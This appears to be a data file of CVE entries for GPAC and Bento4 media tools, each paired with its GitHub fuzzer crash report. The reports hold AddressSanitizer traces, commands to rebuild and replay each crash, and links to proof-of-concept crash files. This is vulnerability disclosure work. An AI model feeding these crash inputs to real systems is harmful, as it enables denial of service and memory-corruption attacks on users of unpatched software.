__interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x7f54a041bd12 in trgt_box_new isomedia/box_code_base.c:10623 SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/box_funcs.c:2074 in gf_isom_box_dump_start_ex Shadow bytes around the buggy address: 0x0c087fff8050: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff8060: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 fa 0x0c087fff8070: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 fa 0x0c087fff8080: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff8090: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 00 =>0x0c087fff80a0: fa fa 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa 0x0c087fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==18099==ABORTING ``` ### Environment ``` Ubuntu 16.04 Clang 10.0.1 gcc 5.5 ```
heap-buffer-overflow isomedia/box_funcs.c:2074 in gf_isom_box_dump_start_ex
https://api.github.com/repos/gpac/gpac/issues/2280/comments
0
2022-10-09T08:31:37Z
2022-10-10T15:44:28Z
https://github.com/gpac/gpac/issues/2280
1,402,198,804
2,280
CVE-2022-43042
2022-10-19T14:15:10.227
GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a heap buffer overflow via the function FixSDTPInTRAF at isomedia/isom_intern.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2278" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2278
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
### Description Heap-buffer-overflow in isomedia/isom_intern.c:227 in FixSDTPInTRAF ### Version ``` $ ./MP4Box -version MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ### Replay ``` git clone https://github.com/gpac/gpac.git cd gpac ./configure --enable-sanitizer make -j$(nproc) ./bin/gcc/MP4Box -bt mp4box-bt-heap-buffer-over-flow-0 ``` ### POC https://github.com/17ssDP/fuzzer_crashes/blob/main/gpac/mp4box-bt-heap-buffer-over-flow-0 ### ASAN ``` [iso file] Unknown box type sjhm in parent sinf [iso file] Unknown box type sgp00 in parent stbl [iso file] Read Box type 00000000 (0x00000000) at position 2168 has size 0 but is not at root/file level. Forbidden, skipping end of parent box ! [iso file] Box "traf" (start 2028) has 458 extra bytes [iso file] Unknown box type shgp in parent traf ================================================================= ==31145==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001914 at pc 0x7fe0339cbbf8 bp 0x7ffc2041a330 sp 0x7ffc2041a320 READ of size 1 at 0x602000001914 thread T0 #0 0x7fe0339cbbf7 in FixSDTPInTRAF isomedia/isom_intern.c:227 #1 0x7fe0339cbbf7 in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:663 #2 0x7fe0339ce0e5 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:866 #3 0x7fe0339ce0e5 in gf_isom_open_file isomedia/isom_intern.c:986 #4 0x55ec82396048 in mp4box_main /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/mp4box.c:6175 #5 0x7fe032987c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #6 0x55ec823690a9 in _start (/home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/bin/gcc/MP4Box+0x4e0a9) 0x602000001914 is located 0 bytes to the right of 4-byte region [0x602000001910,0x602000001914) allocated by thread T0 here: #0 0x7fe035ef3b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x7fe0338a4541 in sdtp_box_read isomedia/box_code_base.c:8354 SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/isom_intern.c:227 in FixSDTPInTRAF Shadow bytes around the buggy address: 0x0c047fff82d0: fa fa 00 00 fa fa 00 00 fa fa 01 fa fa fa 00 00 0x0c047fff82e0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa fd fa 0x0c047fff82f0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8300: fa fa 00 fa fa fa 00 00 fa fa 00 07 fa fa 00 00 0x0c047fff8310: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 00 =>0x0c047fff8320: fa fa[04]fa fa fa 00 00 fa fa 00 00 fa fa fa fa 0x0c047fff8330: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==31145==ABORTING ``` ### Environment ``` Ubuntu 16.04 Clang 10.0.1 gcc 5.5 ```
heap-buffer-overflow isomedia/isom_intern.c:227 in FixSDTPInTRAF
https://api.github.com/repos/gpac/gpac/issues/2278/comments
0
2022-10-09T08:21:31Z
2022-10-10T15:44:27Z
https://github.com/gpac/gpac/issues/2278
1,402,196,162
2,278
CVE-2022-43043
2022-10-19T14:15:10.273
GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function BD_CheckSFTimeOffset at /bifs/field_decode.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2276" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2276
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
### Description SEGV in BD_CheckSFTimeOffset bifs/field_decode.c:58 ### Version ``` $ ./MP4Box -version MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ### Replay ``` git clone https://github.com/gpac/gpac.git cd gpac ./configure --enable-sanitizer make -j$(nproc) ./bin/gcc/MP4Box -bt mp4box-bt-segv-0 ``` ### POC https://github.com/17ssDP/fuzzer_crashes/blob/main/gpac/mp4box-bt-segv-0 ### ASAN ``` [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent minf [iso file] Missing DataInformationBox [iso file] Unknown box type 0000 in parent moov [iso file] Read Box type 0000 (0x30303030) at position 11542 has size 0 but is not at root/file level. Forbidden, skipping end of parent box ! [iso file] Box "moov" (start 20) has 806 extra bytes [iso file] Unknown top-level box type 0000 [iso file] Incomplete box 0000 - start 12356 size 808358436 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent minf [iso file] Missing DataInformationBox [iso file] Unknown box type 0000 in parent moov [iso file] Read Box type 0000 (0x30303030) at position 11542 has size 0 but is not at root/file level. Forbidden, skipping end of parent box ! [iso file] Box "moov" (start 20) has 806 extra bytes [iso file] Unknown top-level box type 0000 [iso file] Incomplete box 0000 - start 12356 size 808358436 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing [ODF] Reading bifs config: shift in sizes (not supported) ASAN:DEADLYSIGNAL | (00/100) ================================================================= ==64022==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000001 (pc 0x7f4bf2457608 bp 0x7fff7805fc00 sp 0x7fff7805f360 T0) ==64022==The signal is caused by a READ memory access. ==64022==Hint: address points to the zero page. #0 0x7f4bf2457607 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b607) #1 0x7f4befd4dd1a in BD_CheckSFTimeOffset bifs/field_decode.c:58 #2 0x7f4befd53e80 in gf_bifs_dec_sf_field bifs/field_decode.c:105 #3 0x7f4befd6a1be in BM_XReplace bifs/memory_decoder.c:355 #4 0x7f4befd6a1be in BM_ParseExtendedUpdates bifs/memory_decoder.c:398 #5 0x7f4befd754ad in BM_ParseInsert bifs/memory_decoder.c:586 #6 0x7f4befd754ad in BM_ParseCommand bifs/memory_decoder.c:908 #7 0x7f4befd7660d in gf_bifs_decode_command_list bifs/memory_decoder.c:1038 #8 0x7f4bf0743bc6 in gf_sm_load_run_isom scene_manager/loader_isom.c:303 #9 0x562cf53f8dd7 in dump_isom_scene /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/filedump.c:207 #10 0x562cf53d37ff in mp4box_main /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/mp4box.c:6336 #11 0x7f4beef6ec86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #12 0x562cf53a50a9 in _start (/home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/bin/gcc/MP4Box+0x4e0a9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b607) ==64022==ABORTING ``` ### Environment ``` Ubuntu 16.04 Clang 10.0.1 gcc 5.5 ```
SEGV BD_CheckSFTimeOffset bifs/field_decode.c:58
https://api.github.com/repos/gpac/gpac/issues/2276/comments
0
2022-10-09T08:13:42Z
2022-10-10T15:44:26Z
https://github.com/gpac/gpac/issues/2276
1,402,194,113
2,276
CVE-2022-43044
2022-10-19T14:15:10.317
GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function gf_isom_get_meta_item_info at /isomedia/meta.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2282" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2282
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
### Description SEGV in isomedia/meta.c:177 in gf_isom_get_meta_item_info ### Version ``` $ ./MP4Box -version MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ### Replay ``` git clone https://github.com/gpac/gpac.git cd gpac ./configure --enable-sanitizer make -j$(nproc) ./bin/gcc/MP4Box -info mp4box-info-segv-1 ``` ### POC https://github.com/17ssDP/fuzzer_crashes/blob/main/gpac/mp4box-info-segv-1 ### ASAN ``` [iso file] Unknown box type i000000 in parent iinf [iso file] Unknown top-level box type v000000 [iso file] Incomplete box v000000 - start 308 size 191662031 [iso file] Incomplete file while reading for dump - aborting parsing # File Meta type: "Meta" - 3 resource item(s) ASAN:DEADLYSIGNAL ================================================================= ==52314==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000028 (pc 0x7f4d67b428f9 bp 0x000000000000 sp 0x7ffcd749c3c0 T0) ==52314==The signal is caused by a READ memory access. ==52314==Hint: address points to the zero page. #0 0x7f4d67b428f8 in gf_isom_get_meta_item_info isomedia/meta.c:177 #1 0x55fa2660a89e in DumpMetaItem /gpac/applications/mp4box/filedump.c:2467 #2 0x55fa26642cc8 in DumpMovieInfo /gpac/applications/mp4box/filedump.c:3820 #3 0x55fa265efee4 in mp4box_main /gpac/applications/mp4box/mp4box.c:6359 #4 0x7f4d669cfc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #5 0x55fa265c00a9 in _start (/gpac/bin/gcc/MP4Box+0x4e0a9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/meta.c:177 in gf_isom_get_meta_item_info ==52314==ABORTING ``` ### Environment ``` Ubuntu 16.04 Clang 10.0.1 gcc 5.5 ```
SEGV isomedia/meta.c:177 in gf_isom_get_meta_item_info
https://api.github.com/repos/gpac/gpac/issues/2282/comments
0
2022-10-09T08:38:17Z
2022-10-10T15:44:29Z
https://github.com/gpac/gpac/issues/2282
1,402,200,347
2,282
CVE-2022-43045
2022-10-19T14:15:10.357
GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function gf_dump_vrml_sffield at /scene_manager/scene_dump.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2277" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2277
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
### Description SEGV scene_manager/scene_dump.c:693 in gf_dump_vrml_sffield ### Version ``` $ ./MP4Box -version MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ### Replay ``` git clone https://github.com/gpac/gpac.git cd gpac ./configure --enable-sanitizer make -j$(nproc) ./bin/gcc/MP4Box -bt mp4box-bt-segv-1 ``` ### POC https://github.com/17ssDP/fuzzer_crashes/blob/main/gpac/mp4box-bt-segv-1 ### ASAN ``` [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent minf [iso file] Missing DataInformationBox [iso file] Unknown box type 0000 in parent moov [iso file] Read Box type 0000 (0x30303030) at position 11542 has size 0 but is not at root/file level. Forbidden, skipping end of parent box ! [iso file] Box "moov" (start 20) has 806 extra bytes [iso file] Unknown top-level box type 0000 [iso file] Incomplete box 0000 - start 12356 size 808358436 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent moov [iso file] Unknown box type 0000 in parent minf [iso file] Missing DataInformationBox [iso file] Unknown box type 0000 in parent moov [iso file] Read Box type 0000 (0x30303030) at position 11542 has size 0 but is not at root/file level. Forbidden, skipping end of parent box ! [iso file] Box "moov" (start 20) has 806 extra bytes [iso file] Unknown top-level box type 0000 [iso file] Incomplete box 0000 - start 12356 size 808358436 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing [ODF] Reading bifs config: shift in sizes (not supported) [MP4 Loading] Unable to fetch sample 38 from track ID 8 - aborting track import Scene loaded - dumping 1 systems streams ASAN:DEADLYSIGNAL ================================================================= ==42376==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x7f6a20c34c94 bp 0x60b000000720 sp 0x7ffd44396130 T0) ==42376==The signal is caused by a READ memory access. ==42376==Hint: address points to the zero page. #0 0x7f6a20c34c93 in gf_dump_vrml_sffield scene_manager/scene_dump.c:693 #1 0x7f6a20c69012 in gf_dump_vrml_simple_field scene_manager/scene_dump.c:775 #2 0x7f6a20c5020c in DumpXReplace scene_manager/scene_dump.c:2291 #3 0x7f6a20c5020c in gf_sm_dump_command_list scene_manager/scene_dump.c:2901 #4 0x7f6a20c77d57 in gf_sm_dump scene_manager/scene_dump.c:3519 #5 0x556786082cef in dump_isom_scene /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/filedump.c:221 #6 0x55678605d7ff in mp4box_main /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/mp4box.c:6336 #7 0x7f6a1f3bac86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #8 0x55678602f0a9 in _start (/home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/bin/gcc/MP4Box+0x4e0a9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV scene_manager/scene_dump.c:693 in gf_dump_vrml_sffield ==42376==ABORTING ``` ### Environment ``` Ubuntu 16.04 Clang 10.0.1 gcc 5.5 ```
SEGV scene_manager/scene_dump.c:693 in gf_dump_vrml_sffield
https://api.github.com/repos/gpac/gpac/issues/2277/comments
0
2022-10-09T08:18:14Z
2022-10-10T15:44:26Z
https://github.com/gpac/gpac/issues/2277
1,402,195,329
2,277
CVE-2022-40885
2022-10-19T18:15:13.287
Bento4 v1.6.0-639 has a memory allocation issue that can cause denial of service.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/761" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/yangfar/CVE/blob/main/CVE-2022-40885.md" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/761
[ "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hello,I use the fuzzer(AFL) to fuzz binary mp42avc and got some crashes which show that allocator is out of memory trying to allocate 0xXXXXXXXX bytes when method new is called. The following is the details. ### Bug1 #### ./mp42avc ~/out/crashes/id\:000017\,sig\:06\,src\:000925+000617\,op\:splice\,rep\:128 3.avc ================================================================= ==4126303==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0xc4b26d23 bytes #0 0x549287 in operator new[](unsigned long) (/root/Bento4/cmakebuild/mp42avc+0x549287) #1 0x558418 in AP4_DataBuffer::AP4_DataBuffer(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:55:16 #2 0x5ec12a in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:513:20 #3 0x5e7b66 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #4 0x6563c0 in AP4_DrefAtom::AP4_DrefAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4DrefAtom.cpp:84:16 #5 0x6559d7 in AP4_DrefAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4DrefAtom.cpp:50:16 #6 0x5ec3a5 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:580:20 #7 0x5e7b66 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #8 0x62e6b0 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #9 0x62e48b in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5 ==4126303==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory (/root/Bento4/cmakebuild/mp42avc+0x549287) in operator new[](unsigned long) ==4126303==ABORTING ### Bug 2 #### [root@iZ8vb29flmohv2ga6wdtfbZ cmakebuild]# ./mp42avc ~/out/crashes/id\:000018\,sig\:06\,src\:000606\,op\:havoc\,rep\:4 3.avc ================================================================= ==4126299==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x7d727b02 bytes #0 0x549287 in operator new[](unsigned long) (/root/Bento4/cmakebuild/mp42avc+0x549287) #1 0x6637c0 in AP4_HdlrAtom::AP4_HdlrAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /root/Bento4/Source/C++/Core/Ap4HdlrAtom.cpp:88:18 ==4126299==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory (/root/Bento4/cmakebuild/mp42avc+0x549287) in operator new[](unsigned long) ==4126299==ABORTING **Ap4HdlrAtom.cpp:88 and Ap4HdlrAtom.cpp will call new[Big size] and then crash.** ### Bug3 #### ./AFL/afl-fuzz -i ./seed2/ -o ./out3 -d -m none ./Bento4/cmakebuild/aac2mp4 @@ 3.mp4 #### After testing, the above problems also occur in acc2mp4 function. #### **The following is the details.** #### [root@iZ8vb29flmohv2ga6wdtfbZ cmakebuild]# ./aac2mp4 ~/out3/crashes/id\:000008\,sig\:06\,src\:000074\,op\:havoc\,rep\:4 3.mp4 #### AAC frame [000000]: size = -7, 96000 kHz, 0 ch ================================================================= ==3788615==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0xfffffff9 bytes #0 0x54a287 in operator new[](unsigned long) (/root/Bento4/cmakebuild/aac2mp4+0x54a287) #1 0x55b578 in AP4_DataBuffer::AP4_DataBuffer(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:55:16 ==3788615==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory (/root/Bento4/cmakebuild/aac2mp4+0x54a287) in operator new[](unsigned long) ==3788615==ABORTING ### input [input.zip](https://github.com/axiomatic-systems/Bento4/files/9595618/input.zip) ### Crashes [crashes.zip](https://github.com/axiomatic-systems/Bento4/files/9595619/crashes.zip) **Report of the Information Security Laboratory of Ocean University of China @OUC_ISLOUC @OUC_Blue_Whale**
Out of memory in Ap4DataBuffer:new AP4_Byte[buffer_size]
https://api.github.com/repos/axiomatic-systems/Bento4/issues/761/comments
0
2022-09-19T00:56:17Z
